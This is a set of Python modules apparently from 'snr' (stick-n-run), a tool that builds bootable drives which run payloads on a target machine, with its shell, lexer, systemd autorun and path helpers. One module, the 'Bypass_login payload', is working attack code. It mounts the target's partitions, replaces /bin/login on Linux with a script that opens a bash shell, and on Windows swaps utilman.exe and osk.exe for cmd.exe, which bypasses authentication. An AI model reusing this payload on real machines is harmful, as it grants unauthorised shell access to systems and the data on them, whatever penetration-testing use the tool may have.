"""
Module containing a class providing support for automatically
running executables on boot while preserving order
"""
import os
import os.path
import pprint

from snr.core.core import context
from snr.core.util import common_utils, programs
from snr.core.util.payloads import systemd_service, systemd_target

__all__ = (
    "Autorun",
)

class Autorun:
    """Providing support for automatically running executables on boot while preserving order
    """
    _services: list[systemd_service.SystemdService] = []
    _custom_target: systemd_target.SystemdTarget
    _context: context.Context

    def __init__(self, ctx: context.Context):
        common_utils.print_debug("Autorun instance created")
        snr_target = systemd_target.SystemdTarget(ctx, "snr")
        snr_target.Unit_section["Description"] = "Snr boot target"
        snr_target.Unit_section["Requires"] = "multi-user.target"
        snr_target.Unit_section["After"] = "multi-user.target"
        self._custom_target = snr_target
        self._context = ctx

    def add_executable(self, path: str, name: str | None = None) -> 'Autorun':
        """Add an executable to be executed to the systemd configuration
        
        Args:
            path: Path to the executable
            name: Name of the service
        
        Returns:
            The class instance itself. This is done for convenience
        """
        service = systemd_service.SystemdService(self._context, os.path.basename(
            path.split(" ", maxsplit=1)[0]) if name is None else name)
        service.Unit_section["Description"] = f"Autorun service for {path}"
        service.Service_section["ExecStart"] = path
        service.Service_section["Type"] = "simple"
        service.Service_section["ExecRestart"] = "/usr/bin/true"
        service.Service_section["ExecStop"] = "/usr/bin/true"
        service.Service_section["StandardInput"] = "tty"
        service.Service_section["StandardOutput"] = "tty"
        service.Service_section["TTYPath"] = "/dev/tty1"
        service.Install_section["RequiredBy"] = "snr.target"
        if len(self._services) > 1:
            common_utils.print_debug(
                f"Service is to be executed after {self._services[-1].basename}")
            # Preserve the original order
            service.Service_section["After"] = self._services[-1].basename
            service.Service_section["Requires"] = self._services[-1].basename
        if os.path.exists(os.path.join(self._context.root_directory, path)):
            errorcode = programs.Chmod().invoke_and_wait(
                None, "+x", self._context.join(path))
            if errorcode != 0:
                common_utils.print_debug(
                    "Marking service executable as +x failed")
        else:
            common_utils.print_debug(
                "Skipping making service executable as +x due to the executable not existing")
        self._services.append(service)
        common_utils.print_debug(
            "New service added:\n"
            f"Unit: {pprint.pformat(service.Unit_section)}\n"
            f"Service: {pprint.pformat(service.Service_section)}\n"
            f"Install:{pprint.pformat(service.Install_section)}")
        return self

    def write(self) -> None:
        """Write the systemd configuration to the target
        """
        target_requires = "".join(
            [service.basename for service in self._services])
        # Update the Requires entry of snr.target
        self._custom_target.Unit_section["Requires"] = target_requires
        # Create the snr target and link it as the default one
        self._custom_target.write()
        try:
            os.remove(os.path.join(systemd_service.SYSTEMD_SYSTEM_PATH(
                self._context), "default.target"))
        except FileNotFoundError:
            pass
        os.symlink("snr.target", os.path.join(systemd_service.SYSTEMD_SYSTEM_PATH(self._context),
                                              "default.target"))
        snr_target_requires_dir = os.path.join(systemd_service.SYSTEMD_SYSTEM_PATH(self._context),
                                               "snr.target.requires")
        for service in self._services:
            service.write(False, False)
            os.symlink(os.path.join("..", service.basename),
                       os.path.join(snr_target_requires_dir,
                                    service.basename))



"""
Variable manager, containing methods to set, get and delete variables
"""
import dataclasses
import warnings

__all__ = (
    "VariableType", "VariableTypeType",
    "VariableTypesTuple", "VariableInfo",
    "VariableManager"
)

# Type that matches all possible variable types
VariableType = str | int | bool | list[str]
# Type of type that matches all possible variable types
VariableTypeType = type[str | int | bool | list[str]]
# Tuple that matches all possible variable types
VariableTypesTuple = (str, int, bool, list)


@dataclasses.dataclass
class VariableInfo:  # pylint: disable=too-few-public-methods
    """Variable's info
    """
    description: str = ""
    length: int = -1
    var_type: VariableTypeType = str
    used_by_payload: bool = False
    required: bool = False
    default_value: VariableType | None = None


class VariableManager:
    """Variable manager, containing methods to set, get and delete variables
    """
    _variables: dict[str, tuple[VariableType, VariableInfo]]
    _VariableValueType = tuple[VariableType, VariableInfo]

    def __init__(self,
                 pre: dict[str, _VariableValueType] | None = None):
        if pre is None:
            self._variables = {}
        else:
            self._variables = {**pre}

    def __repr__(self) -> str:
        return f"{type(self).__name__}({repr(self._variables)})"

    def has_variable(self, name: str) -> bool:
        """Check if variable is defined

        Args:
            name: Name of variable to check

        Returns:
            True if variable is defined False
        """
        return name in self._variables

    def set_variable(self, name: str, value: VariableType,
                     info_length: int = -1, info_description: str = "",
                     info_used_by_payload: bool = False, required: bool = False) -> None:
        """Set value of variable.

        Args:
            name: Name of variable to set
            value: Value of variable
            info_length: Length of variable if -1 no length will be set
            info_description: Description of variable
            info_used_by_payload: Is the variable used a payload
            required: Is the variable required to be set
        """
        if isinstance(value, VariableTypesTuple):
            if isinstance(value, list):
                for i, element in enumerate(value):
                    if not isinstance(element, VariableTypesTuple):
                        raise ValueError(
                            f"Unsupported type of value[{i}]")
                value = list(value)
        else:
            raise ValueError(f"Unsupported type '{type(value)}'")

        if type(value) in (int, bool) and info_length != -1:
            warnings.warn("Variables of integer types cannot have length")
            info_length = -1

        if name in self._variables and not info_used_by_payload:
            info = self._variables[name][1]
            if not isinstance(value, info.var_type):
                raise TypeError(
                    f"'{value}' is not of type defined for variable")
            if info.length != -1 and isinstance(value, (str, list)):
                if len(value) > info.length:
                    warnings.warn(
                        f"Value does not fit the size ({info.length})")
                    info_length = -1
            if info_length != -1:
                info.length = info_length
            if len(info_description) == 0:
                info.description = info_description
        else:
            info = VariableInfo()
            info.length = info_length
            info.description = info_description
            info.var_type = type(value)
            info.used_by_payload = info_used_by_payload
            info.required = required
            if info_used_by_payload:
                info.default_value = value
        self._variables[name] = (value, info)

    def del_variable(self, name: str) -> None:
        """Delete a variable from the variable map

        Args:
            name: Name of the variable to delete
        """
        if name in self._variables:
            del self._variables[name]

    def get_variable(self, name: str) -> VariableType:
        """Get the variable with the given name

        Args:
            name: The name of the variable to get

        Returns:
            The variable with the given name
        """
        if name in self._variables:
            return self._variables[name][0]
        raise ValueError(f"No variable named '{name}'")

    def get_variable_str(self, name: str) -> str:
        """Get the variable with the given name, interpreting it as a string

        Args:
            name: The name of the variable to get.

        Raises:
            TypeError: The variable is not meant to be interpreted as a string

        Returns:
            The variable with the given name
        """
        if self.get_variable_info(name).var_type != str:
            raise TypeError(
                f"Variable '{name}' is not to be interpreted as a string")
        return str(self.get_variable(name))

    def get_variable_list(self, name: str) -> list[str]:
        """Get the variable with the given name, interpreting it as a string

        Args:
            name: The name of the variable to get.

        Raises:
            TypeError: The variable is not meant to be interpreted as a list

        Returns:
            The variable with the given name
        """
        if self.get_variable_info(name).var_type != list:
            raise TypeError(
                f"Variable '{name}' is not to be interpreted as a list")
        value = self.get_variable(name)
        assert isinstance(value, list)
        return value

    def get_variable_info(self, name: str) -> VariableInfo:
        """Get information about a variable

        Args:
            name: Name of the variable to get information about

        Raises:
            KeyError: Name is not a recognized variable

        Returns:
            Variable information
        """
        if name in self._variables:
            return self._variables[name][1]
        raise KeyError(f"No variable named '{name}'")

    def get_variables_name(self) -> list[str]:
        """Get list of variables names.

        Returns:
            list of variable names
        """
        return list(self._variables.keys())

    def get_variables_value(self) -> list[VariableType]:
        """Get list of variables values.

        Returns:
            list of variable values
        """
        return list(v[0] for v in self._variables.values())

    def get_variables_info(self) -> list[VariableInfo]:
        """Get list of all variable's info

        Returns:
            list of all variable info
        """
        return list(v[1] for v in self._variables.values())



"""
Satisfy the reported payload dependencies
"""

from snr.core.core import context, options, common_paths
from snr.core.payload_generation import common
from snr.core.payload import payload
from snr.core.util import chroot_programs, common_utils

__all__ = (
    "ensure_dependencies",
)

ROOTFS_VERSION_PATCHES = [
    ("python3-deprecated", "python3-impacket", "python3-pycryptodome")  # v2
]


def ensure_dependencies(ctx: context.Context) -> bool:
    """Install dependencies of the payload

    Args:
        ctx: Context

    Returns:
        Whatever operation was successful or not
    """
    assert options.payload_module is not None
    p: payload.Payload = options.payload_module.payload  # pylint: disable=no-member
    # Check if the rootfs version is ok
    rootfs_version = getattr(
        p, "ROOTFS_VERSION", common_utils.get_rootfs_version())
    current_rootfs_version = common_utils.get_rootfs_version()
    if rootfs_version > common_paths.ROOTFS_CURRENT_VERSION:
        common_utils.print_error(
            f"Payload requires rootfs version {rootfs_version} however it is not known to us")
        return False
    if rootfs_version > current_rootfs_version:
        # We need to patch it up
        common_utils.print_info(
            f"Payload requires rootfs version {rootfs_version} but the current version is {current_rootfs_version}. Patching up!")
        for i in range(current_rootfs_version - 1, rootfs_version):
            p.DEPENDENCIES = (*p.DEPENDENCIES, *ROOTFS_VERSION_PATCHES[i])
    if len(p.DEPENDENCIES) != 0:
        common_utils.print_debug(
            "Installing dependencies of the payload:" +
            ' '.join(p.DEPENDENCIES))
        apt_get = chroot_programs.apt_get_factory(ctx)(
            stdout=chroot_programs.PIPE,
            stderr=chroot_programs.STDOUT,
        )

        errorcode = apt_get.invoke_and_wait(None,
                                            *p.DEPENDENCIES,
                                            options={
                                                "quiet": "2"
                                            })
        if errorcode != 0:
            assert apt_get.stdout is not None
            common_utils.print_debug(
                f"Command's output: {apt_get.stdout.read()}")
            return common.clean_and_exit(ctx, "Installing dependencies of payload failed")
    else:
        common_utils.print_debug("Payload has no dependencies, nothing to do")
    return True



"""Snr shell commands lexer
"""
from typing import Any

import pygments.lexer
import pygments.token

__all__ = (
    "SnrLexer",
)

CHECKSUM_ALGORITHMS = (
    "blake2b", "md5", "sha1",
    "sha224", "sha256", "sha384", "sha512"
)

# pylint: disable=consider-using-f-string


def command_no_args(x: str) -> dict[str, list[tuple[str, Any, str]]]:
    return {x: [
        (r'(\s*)({0})'.format(x),
         pygments.lexer.bygroups(
            pygments.token.Whitespace,
            pygments.token.Keyword),
         'eoc')
    ]}


def command_args(x: str) -> dict[str, list[tuple[str, Any, str]]]:
    return {x: [
        (r'(\s*)({0})(\s+)'.format(x),
         pygments.lexer.bygroups(
            pygments.token.Whitespace,
            pygments.token.Keyword,
            pygments.token.Whitespace,
        ), 'basic')
    ]}


def command_key_no_args(x: str, keywords: tuple[str, ...]) -> dict[str, list[tuple[str, Any, str]]]:
    return {x: [
        (r'(\s*)({0})(\s+)({1})'.format(x, keywords),
         pygments.lexer.bygroups(
             pygments.token.Whitespace,
             pygments.token.Keyword,
             pygments.token.Whitespace,
             pygments.token.Keyword.Constant,
        ), 'eoc')
    ]}


def command_key_args(x: str, keywords: tuple[str, ...]) -> dict[str, list[tuple[str, Any, str]]]:
    return {x: [
        (r'(\s*)({0})(\s+)({1})(\s+)'.format(x, "|".join(keywords)),
         pygments.lexer.bygroups(
             pygments.token.Whitespace,
             pygments.token.Keyword,
             pygments.token.Whitespace,
             pygments.token.Keyword.Constant,
             pygments.token.Whitespace
        ), 'basic')
    ]}


SYNTAX = {
    **command_no_args('pwd'),
    **command_args("chdir"),
    **command_args("list"),
    **command_args("read"),
    **command_key_args("checksum", CHECKSUM_ALGORITHMS),
    **command_args("unset"),
    # Special case
    'set': [
        # Set assign to command output
        (r'(\s*)(set)(\s+)(!)(\w+)(\s+)',
         pygments.lexer.bygroups(
             pygments.token.Whitespace,
             pygments.token.Keyword,
             pygments.token.Whitespace,
             pygments.token.Operator,
             pygments.token.Name.Variable,
             pygments.token.Whitespace,
         ), 'commands'),
        # Set assign to value
        (r'(\s*)(set)(\s+)(\w+)(\s+)',
         pygments.lexer.bygroups(
             pygments.token.Whitespace,
             pygments.token.Keyword,
             pygments.token.Whitespace,
             pygments.token.Name.Variable,
             pygments.token.Whitespace,
         ), 'basic'),
        *command_args("set")["set"]
    ],
    **command_args("use"),
    **command_args("generate"),
    **command_no_args("clear"),
    **command_args("echo"),
    **command_args("exit"),
    **command_args("help"),
    **command_no_args("info"),
    **command_no_args("pdb"),
    **command_no_args("reload")
}


class SnrLexer(pygments.lexer.RegexLexer):  # type: ignore
    """Lexer for snr shell commands"""
    name = 'SnrLexer'

    tokens = {
        'root': [
            pygments.lexer.include('commands')
        ],
        'commands': [
            pygments.lexer.include('pwd'),
            pygments.lexer.include('chdir'),
            pygments.lexer.include('list'),
            pygments.lexer.include('read'),
            pygments.lexer.include('checksum'),
            pygments.lexer.include('unset'),
            pygments.lexer.include('set'),
            pygments.lexer.include('use'),
            pygments.lexer.include('generate'),
            pygments.lexer.include('clear'),
            pygments.lexer.include('echo'),
            pygments.lexer.include('exit'),
            pygments.lexer.include('help'),
            pygments.lexer.include('info'),
            pygments.lexer.include('pdb'),
            pygments.lexer.include('reload')
        ],
        'eoc': [
            (r'\s', pygments.token.Whitespace),
            (r'#.*$', pygments.token.Comment.Single),
            (r'\S+', pygments.token.Error)
        ],
        'basic': [
            (r'(?<!\\)\$\w+', pygments.token.Name.Variable),
            (r'\b\d+\b', pygments.token.Number),
            (r'\s', pygments.token.Whitespace),
            (r'(?<!\!).+', pygments.token.Text),
        ],
        **SYNTAX
    }



"""
Core and common utilities. If a function is found here 
and also in snr.core.core, it is advised to use the one here
"""
import os
import os.path
import pdb
import shutil
import sys
import contextlib
from shutil import get_terminal_size
from typing import IO, Any, Callable, NoReturn

import deprecated
import rich.console
import rich.pretty
import rich.traceback

from snr.core.core import common_paths, console, context, options
from snr.core.core.logging import (carriage_return, clear_screen, print_debug,
                                   print_error, print_fatal, print_info,
                                   print_ok, print_sys, print_warning)

__all__ = (
    "get_terminal_size", "carriage_return",
    "clear_screen", "print_debug",
    "print_error", "print_fatal",
    "print_info", "print_ok",
    "print_sys", "print_warning",
    "EXTERNAL_CALL_FAILURE", "bytes_to_str_repr",
    "remake_dir", "graceful_exit",
    "call_external_function", "rootfs_open",
    "rootfs_makedirs", "get_rootfs_version",
    "temp_chdir", "UserError"
)

# External function call failed
EXTERNAL_CALL_FAILURE = "\x01"


class UserError(Exception):
    """An error by the user, when used by commands, the command dispatch will catch it and report it as a message"""
    message: str

    def __init__(self, message: str):
        self.message = message

    def __str__(self) -> str:
        return self.message


def bytes_to_str_repr(value: bytes) -> str:
    """Convert bytes to their string representation (as you would use in a python code)


    Returns:
        string backslash escaped representation of input
    """
    return repr(value)[2:-1]


def remake_dir(path: str) -> None:
    """Remove and recreate a directory.

    Args:
        path_ Path to the directory
    """
    shutil.rmtree(path)
    os.mkdir(path)


def graceful_exit() -> NoReturn:
    """Gracefully exit the program
    """
    sys.exit(options.default_exit_code)


def handle_exception() -> None:
    """Handle an exception. If debug mode is on. It drops to a default shell.
    """
    rich_trb = rich.traceback.Traceback(show_locals=options.verbose)
    console.err_console.print(rich_trb)
    rich.pretty.install()
    if options.debug:
        print_ok("Dropping to a debug shell")
        pdb.post_mortem()  # pylint: disable=no-member


def call_external_function(func: Callable[..., Any], *args: object, **kwargs: object) -> Any:
    """Call an external function catching and reporting any exceptions

    Args:
        func Function to call. Must be a callable

    Returns:
      The return value of the called function, or if the call failed EXTERNAL_CALL_FAILURE.
      It is recommended to check call failure with `result is EXTERNAL_CALL_FAILURE` and not `==`
      because EXTERNAL_CALL_FAILURE is a value and can be returned by a possible function
    """
    try:
        return func(*args, **kwargs)
    except UserError as exc:
        print_error(exc.message)
        return 1
    except Exception:  # pylint: disable=broad-exception-caught
        print_debug("Calling external function failed")
        handle_exception()
        return EXTERNAL_CALL_FAILURE


@deprecated.deprecated("Use context's makedirs instead", version="1.1.0")
def rootfs_makedirs(ctx: context.Context, path: str, mode: int = 511, exist_ok: bool = False) -> None:
    """makedirs but for rootfs

    Args:
        ctx: Context
        path: Path to directory to create
        mode: Directory permissions. Defaults to 511
        exist_ok: Whatever it's okay for directories to exist or not. Defaults to False
    """
    return ctx.makedirs(path, mode, exist_ok)


@deprecated.deprecated("Use context's open instead", version="1.1.0")
def rootfs_open(ctx: context.Context, file: str, mode: str = "r",
                buffering: int = -1, encoding: str | None = None) -> IO[Any]:
    """Open a file in rootfs

    Args:
        ctx: Context
        file: The file to open.
        mode: The mode to open the file with
        buffering: The buffering size to use
        encoding: The encoding to use. If None the default encoding will be used

    Returns:
        The opened stream
    """
    return ctx.open(file, mode, buffering, encoding)


def get_rootfs_version() -> int:
    """Get version of the current rootfs

    Returns:
        Version of the current rootfs
    """
    if not os.path.exists(common_paths.ROOTFS_ARCHIVE_VERSION_PATH):
        print_sys("Could not read version data, assuming version 1")
        return 1
    with open(common_paths.ROOTFS_ARCHIVE_VERSION_PATH, encoding="utf-8") as stream:
        data = stream.read()

    try:
        return int(data.strip().strip("\n"))
    except ValueError:
        print_sys("Invalid data found in rootfs archive version file")
        return 0


if hasattr(contextlib, "chdir"):
    temp_chdir = getattr(contextlib, "chdir")
else:
    class chdir(contextlib.AbstractContextManager[None]):
        """Temporarily change working directory. Should be used with `with`

        Attributes:
            path: Path to change directory to
        """

        path: str
        _orig_path: str

        def __init__(self, path: str):
            self.path = path
            self._orig_path = os.getcwd()

        def __enter__(self) -> None:
            os.chdir(self.path)

        def __exit__(self, *_: Any) -> None:
            os.chdir(self._orig_path)



"""
Filesystem-related commands
"""
import hashlib
import os
import os.path

import click

from snr.cli import interactive_shell
from snr.core.core import common_paths
from snr.core.util import common_utils


@interactive_shell.interactive_shell.command(name="pwd")
def cmd_pwd() -> str | None:
    """\
Print current working directory
    """
    return os.getcwd()


@interactive_shell.interactive_shell.command(name="chdir")
@click.argument("directory", type=click.Path(exists=True, file_okay=False), required=True)
def cmd_chdir(directory: str) -> None:
    """\
Change current working directory
    """
    if len(directory) == 0:
        directory = common_paths.CACHE_PATH
    os.chdir(directory)
    common_utils.print_debug(f"New working directory: '{directory}'")


@interactive_shell.interactive_shell.command(name="list")
@click.argument("directory", type=click.Path(exists=True, file_okay=False), required=False)
def cmd_list(directory: str | None) -> str | None:
    """\
List files and directory inside a directory\
 or current working directory if none passed
    """
    if directory is None:
        directory = os.getcwd()
    output = ""
    for entry in os.listdir(directory):
        if os.path.isdir(entry):
            output += f"{entry}/\n"
        else:
            output += f"{entry}\n"
    return output


@interactive_shell.interactive_shell.command(name="read")
@click.argument("file", type=click.Path(exists=True, dir_okay=False), required=True)
def cmd_read(file: str) -> str | None:
    """\
Read the content of a file
    """
    if os.path.isdir(file):
        common_utils.print_error(f"'{file}' is a directory")
        return None
    try:
        with open(file, "r", encoding="utf-8") as stream:
            content = stream.read()
    except OSError as exc:
        common_utils.print_error(f"Could not read file '{file}'")
        common_utils.print_error(exc)
        return None
    return content


@interactive_shell.interactive_shell.command(name="checksum")
@click.argument("algorithm", required=True,
                type=click.Choice(["blake2b", "md5", "sha1",
                                   "sha224", "sha256", "sha384", "sha512"], False))
@click.argument("file", type=click.Path(exists=True, dir_okay=False), required=True)
def cmd_checksum(file: str, algorithm: str) -> str | None:
    """\
Calculate checksum of a file.
Valid algorithms are: blake2b, md5, sha1, sha224, sha256, sha384, sha512
    """
    # Writing checksum algorithm's names as uppercase (MD5)
    # is far too common to not support
    algorithm = algorithm.lower()
    if not os.path.exists(file):
        common_utils.print_error("No such file or directory")
        return None
    if os.path.isdir(file):
        common_utils.print_error(f"{file} is a directory")
        return None
    try:
        with open(file, "rb") as stream:
            return hashlib.new(algorithm, stream.read()).hexdigest()
    except OSError as exc:
        common_utils.print_error("Could not generate checksum")
        common_utils.print_debug(exc)
    return None



"""
Module containing utility functions to install snr's library onto the target
"""
import os
import os.path
import pathlib
import shutil

from snr.core.core import context
from snr.core.util import common_utils

__all__ = (
    "SNR_CORE_DIR", "DIST_PACKAGES_DIR",
    "install_snr_core_lib"
)

# Path to the currently installed snr core's root
SNR_CORE_DIR = pathlib.Path(__file__).parents[2]


def DIST_PACKAGES_DIR(ctx: context.Context) -> str:  # pylint: disable=invalid-name
    """Return the path to the dist-packages directory
     
    Args:
        ctx: The context to use for obtaining the directory
    
    Returns:
        The path to the dist-packages
    """
    return ctx.join("lib", "python3", "dist-packages")


def install_snr_core_lib(ctx: context.Context) -> None:
    """Install snr core library onto target

    Args:
        ctx: context to install snr core library
    """
    common_utils.print_debug("Installing snr core library to target")
    os.makedirs(os.path.join(
        DIST_PACKAGES_DIR(ctx), "snr"), exist_ok=True)
    shutil.copytree(SNR_CORE_DIR, os.path.join(
        DIST_PACKAGES_DIR(ctx), "snr", "core"))
    common_utils.print_debug("Installed snr core library successfully")



"""
Console wrappers
"""

import rich.console

__all__ = (
    "console", "err_console"
)


# Standard console
console = rich.console.Console()

# Standard console for error
err_console = rich.console.Console(stderr=True)



#!/usr/bin/python3
"""
Bypass_login payload
"""
from snr.core.payload import entry_point, storage
from snr.core.util import common_utils, programs

PASSPHRASES = "@PASSPHRASES@"


@entry_point.entry_point
def main() -> None:
    block_info, _, our_device = storage.setup()
    common_utils.print_info("Bypass_login payload started")
    for part in storage.query_all_partitions(block_info):
        if storage.get_partition_root(part, block_info) == our_device:
            continue
        with storage.mount_partition(part, PASSPHRASES) as mounted_part:
            part_info = storage.query_partition_info_by_path(part, block_info)
            assert part_info is not None
            # Try to see if we are dealing with any sort of Linux
            if (mounted_part.exists("usr/sbin/init") or mounted_part.exists("usr/bin/init")) \
                    and mounted_part.exists("etc/shadow"):
                # On Linux, replace login with a script that calls bash
                mounted_part.copy("bin/login", "bin/login.bak")
                mounted_part.remove("bin/login")
                # You might wonder, why not wrap around login binary itself?
                # Because we don't know if root login is blocked or not
                with mounted_part.open("bin/login", "w", encoding="utf-8") as stream:
                    stream.write("#!/bin/bash\n")
                    stream.write("exec /bin/bash -il\n")
                programs.Chmod().invoke_and_wait(None, "+x", mounted_part.join("bin/login"))

            elif mounted_part.exists("Windows"):
                # Use the utilman trick
                for program in ("utilman.exe", "osk.exe"):
                    mounted_part.copy(
                        f"Windows/System32/{program}", f"Windows/System32/{program}.bak")
                    mounted_part.remove(f"Windows/System32/{program}")
                    mounted_part.copy("Windows/System32/cmd.exe",
                                      f"Windows/System32/{program}")
            else:
                common_utils.print_warning("Unknown operating system!")

    common_utils.print_ok("Bypass_login payload completed")



"""
Library support for the safety pin. The safety pin is a feature on all payloads.
It checks whatever the payload is installed or not and if not running from a target, it won't run.
All the payloads that come with snr do use the safety pin.
For custom written payloads, you must use the entry_point function decorator
"""
import os.path

__all__ = (
    "check_lack_of_safety_pin", "remove_safety_pin",
    "require_lack_of_safety_pin"
)


def check_lack_of_safety_pin() -> bool:
    """Check if the safety pin is lacking

    Returns:
        True, if there is a problem False
    """
    return os.path.exists("/root/.give_em_hell")


def remove_safety_pin(root: str) -> None:
    """Remove the safety pin

    Args:
        root: path to root of the filesystem to remove it's safety pin
    """
    with open(os.path.join(root, "root", ".give_em_hell"), "w", encoding="utf-8") as stream:
        stream.write("Safety Pin")


def require_lack_of_safety_pin() -> None:
    """Check if we lack the safety pin. If the safety pin exists, exit the program

    Raises:
        SystemExit: If safety pin exists
    """
    if not check_lack_of_safety_pin():
        raise SystemExit(1)



"""
Core code of the interactive shell
"""
import bdb
import os
import os.path
from typing import Any

import click
import prompt_toolkit
import prompt_toolkit.auto_suggest
import prompt_toolkit.history
import prompt_toolkit.lexers
import prompt_toolkit.styles
import pygments.styles
import pyfiglet

from snr import version
from snr.cli import lexer, variables
from snr.core.core import common_paths, console, options
from snr.core.util import common_utils


__all__ = (
    "prompt", "dispatch_command",
    "interactive_shell"
)

prompt: str


def _count_payloads() -> int:
    try:
        count = 0
        payload_set_dir = os.path.join(
            common_paths.PAYLOAD_SET_PATH)
        categories = os.listdir(payload_set_dir)
        for category in categories:
            category_path = os.path.join(payload_set_dir, category)
            if os.path.isdir(category_path):
                for content in os.listdir(category_path):
                    payload_path = os.path.join(category_path, content)
                    if os.path.isdir(payload_path) and os.path.exists(os.path.join(payload_path, "__init__.py")):
                        count += 1
        return count

    except Exception as exc:  # pylint: disable=broad-exception-caught
        common_utils.print_info(f"Failed to count payloads: {exc}")
        return 0


def _format_banner() -> str:
    banner = pyfiglet.Figlet(font="slant").renderText("stick->'n'->run")
    return f"[blue]{banner}[/blue]\n" + \
        f"--> Version: [red]{version.__version__}[/red]\n" + \
        f"--> Homepage: [red]{version.HOMEPAGE}[/red]\n" + \
        f"--> [red]{_count_payloads()}[/red] Available Payloads\n"


def _expand_vars(line: list[str]) -> list[str]:
    new_cmdline: list[str] = []
    for arg in line:
        if arg.startswith("$") and not arg.startswith("\\$"):
            # This argument must be replaced
            var_name = arg.removeprefix("$")
            if variables.global_vars.has_variable(var_name):
                # Format it, it is either str, int, bool or a list of those
                var_value = variables.global_vars.get_variable(var_name)
                if isinstance(var_value, (int, bool)):
                    var_value = str(var_value)
                elif isinstance(var_value, list):
                    var_value = ";".join(*map(str, var_value))
                new_cmdline.append(var_value)
            else:
                common_utils.print_error(f"No variable named '{var_name}'")
                new_cmdline.append(arg)
        else:
            new_cmdline.append(arg)
    return new_cmdline


def _read_input(session: prompt_toolkit.PromptSession[str]) -> str:

    return session.prompt([("class:prompt", prompt)])


def dispatch_command(ctx: click.Context, group: click.Group, line: str) -> str:
    """Dispatch a command

    Args:
        ctx: Click context
        group: Group to dispatch command
        line: Command and it's arguments

    Returns:
        Return value of command, or an empty string if it didn't return anything
    """
    if len(line) == 0:
        return ""
    command = line.split()[0]
    args = line.split()[1:]
    args = _expand_vars(args)
    subcommand = group.commands.get(command)
    if subcommand:
        ctx.params.clear()
        try:
            subcommand.parse_args(ctx, args)
            output: str | None = ctx.forward(subcommand)
            if output is None:
                return ""
            return output
        except bdb.BdbQuit:
            pass
        except common_utils.UserError as exc:
            common_utils.print_error(exc.message)
        except click.UsageError as e:
            console.console.print(e.format_message())
        except Exception:  # pylint: disable=broad-exception-caught
            common_utils.print_error(
                "Executing a command failed."
                " This is likely to be an issue in snr itself."
                f" Please report this issue at {version.HOMEPAGE}/issues")
            common_utils.handle_exception()
        finally:
            # Do not forget to clear the parsed args, otherwise parsed data will transfer to the next command
            ctx.params.clear()
    else:
        common_utils.print_sys(f"No command named '{command}' found")
    return ""


@click.group(name="interactive_shell",
             invoke_without_command=True)
@click.pass_context
@click.option("--verbose", "-v", is_flag=True)
@click.option("--quiet", "-q", is_flag=True)
@click.option("--arch", "payload_arch")
@click.option("--init", "do_init", is_flag=True)
@click.option("--init-only", is_flag=True)
@click.option("--init-if-needed", is_flag=True)
@click.option("--reinit", "do_reinit", is_flag=True)
@click.option("--host-primary-nameserver")
@click.option("--host-secondary-nameserver")
@click.option("--host-hostname")
@click.option("--user-agent")
@click.option("--default-exit-code")
@click.option("--debug", is_flag=True)
@click.option("--version", is_flag=True)
def interactive_shell(ctx: click.Context, /, **_: dict[str, Any]) -> None:
    """Interactive shell's main function

    Args:
        ctx: Click context
    """
    global prompt  # pylint: disable=global-statement
    if ctx.invoked_subcommand is None:
        # Do not pass the program's params to the shell commands
        ctx.params.clear()
        prompt = options.PROMPT_UNLOADED
        if not options.quiet:
            console.console.print(_format_banner())
        common_utils.print_debug(
            "Command line loop reached. Initialization finished")
        session: prompt_toolkit.PromptSession[str] = prompt_toolkit.PromptSession(
            history=prompt_toolkit.history.FileHistory(
                os.path.join(common_paths.STATE_PATH, "history.txt")),
            auto_suggest=prompt_toolkit.auto_suggest.AutoSuggestFromHistory(),
            lexer=prompt_toolkit.lexers.PygmentsLexer(
                lexer.SnrLexer) if not options.quiet else None,
            style=prompt_toolkit.styles.merge_styles([
                prompt_toolkit.styles.style_from_pygments_cls(
                    pygments.styles.get_style_by_name("vs")),
                prompt_toolkit.styles.Style.from_dict({
                    "prompt": "#00e000 bold",
                })
            ]))
        while True:
            console.console.print(dispatch_command(
                ctx, interactive_shell, _read_input(session)))



"""
Common paths used by snr and possibly by payloads
"""
import os.path
import pathlib

__all__ = (
    "USER_HOME_PATH", "XDG_DATA_HOME",
    "XDG_CONFIG_HOME", "XDG_CACHE_HOME",
    "DATA_PATH", "CONFIG_PATH",
    "STATE_PATH", "CACHE_PATH",
    "PAYLOAD_SET_PATH",
    "ROOTFS_ARCHIVE_BASE_PATH",
    "ROOTFS_ARCHIVE_PATH", "ROOTFS_ARCHIVE_FORMAT",
    "ROOTFS_ARCHIVE_EXTENSION",
    "format_rootfs_archive_path"
)

# User's home path
USER_HOME_PATH = os.path.expanduser("~")
# XDG data directory
XDG_DATA_HOME = os.environ.get(
    "XDG_DATA_HOME", os.path.join(USER_HOME_PATH, ".local", "share"))
# XDG config directory
XDG_CONFIG_HOME = os.environ.get(
    "XDG_CONFIG_HOME", os.path.join(USER_HOME_PATH, ".config"))
# XDG state directory
XDG_STATE_HOME = os.environ.get(
    "XDG_STATE_HOME", os.path.join(USER_HOME_PATH, ".local", "state"))
# XDG cache directory
XDG_CACHE_HOME = os.environ.get(
    "XDG_CACHE_HOME", os.path.join(USER_HOME_PATH, ".cache"))
# Snr's data path
DATA_PATH = os.path.join(XDG_DATA_HOME, "snr")
# Snr's configuration path
CONFIG_PATH = os.path.join(XDG_CONFIG_HOME, "snr")
# Snr's state path
STATE_PATH = os.path.join(XDG_STATE_HOME, "snr")
# Snr's cache path
CACHE_PATH = os.path.join(XDG_CACHE_HOME, "snr")

PAYLOAD_SET_PATH = str(pathlib.Path(__file__).parents[2] / "payloads")
# Snr's rootfs archive base path
ROOTFS_ARCHIVE_BASE_PATH = os.path.join(DATA_PATH, "jammy-{machine}")
# Current version of rootfs archive
ROOTFS_CURRENT_VERSION = 2
# The lowest version of supported rootfs archive
ROOTFS_MIN_VERSION = 2
# Snr's rootfs archive path
ROOTFS_ARCHIVE_PATH = ""
# The archive version
ROOTFS_ARCHIVE_VERSION_PATH = ""
# Snr's rootfs archive format
ROOTFS_ARCHIVE_FORMAT = "r:gz"
# Snr's rootfs archive file extension
ROOTFS_ARCHIVE_EXTENSION = ".tar.gz"


def format_rootfs_archive_path(machine: str) -> None:
    """Updates rootfs archive variables

    Args:
        machine: The machine architecture
    """
    global ROOTFS_ARCHIVE_BASE_PATH  # pylint: disable=global-statement
    global ROOTFS_ARCHIVE_PATH  # pylint: disable=global-statement
    global ROOTFS_ARCHIVE_VERSION_PATH  # pylint: disable=global-statement
    ROOTFS_ARCHIVE_BASE_PATH = ROOTFS_ARCHIVE_BASE_PATH.format(machine=machine)
